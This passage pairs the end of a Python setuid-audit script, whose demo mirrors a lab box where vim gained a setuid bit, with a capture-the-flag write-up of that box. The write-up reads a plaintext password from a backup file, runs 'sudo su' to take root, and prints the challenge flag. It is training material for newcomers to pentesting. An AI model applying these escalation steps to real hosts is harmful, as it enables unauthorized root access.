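    'missing' deserves a look too, since a cleared bit can break tooling."""
    paths = set(inventory)
    return {"unexpected": sorted(paths - baseline), "missing": sorted(baseline - paths)}


def run_demo():
    root = tempfile.mkdtemp()
    # constructed tree mirroring the box after kay's history: vim got
    # 'chmod u+s', less had its bit removed with 'chmod u-s'
    layout = {
        "bin/su": 0o4755, "bin/ping": 0o4755, "usr/bin/passwd": 0o4755,
        "usr/bin/sudo": 0o4755, "usr/bin/chsh": 0o4755,
        "usr/bin/vim": 0o4755,  # the unexpected addition
        "bin/less": 0o755,      # executable, but no set-id bit
    }
    for rel, mode in layout.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")  # placeholder body
        os.chmod(p, mode)
    return compare(setid_inventory(root), BASELINE)


if __name__ == "__main__":
    print(run_demo())  # {'unexpected': ['usr/bin/vim'], 'missing': []}
```

On a real host, setid_inventory("/") should be run with /proc, /sys and network mounts excluded, and the stored baseline compared by path and mode (and ideally by hash) rather than by path alone.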
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$ sudo su
[sudo] password for kay:
root@basic2:/home/kay# id
uid=0(root) gid=0(root) groups=0(root)
It was kay's password.
Bonus
root@basic2:/home/kay# cd /root
root@basic2:~# ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you'll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach out to me. Happy hacking!
Wrap-up
- John modules that aren't registered as commands were sitting in "/usr/share/john".
- I thought there might be an approach via Apache passwords, but that didn't pan out.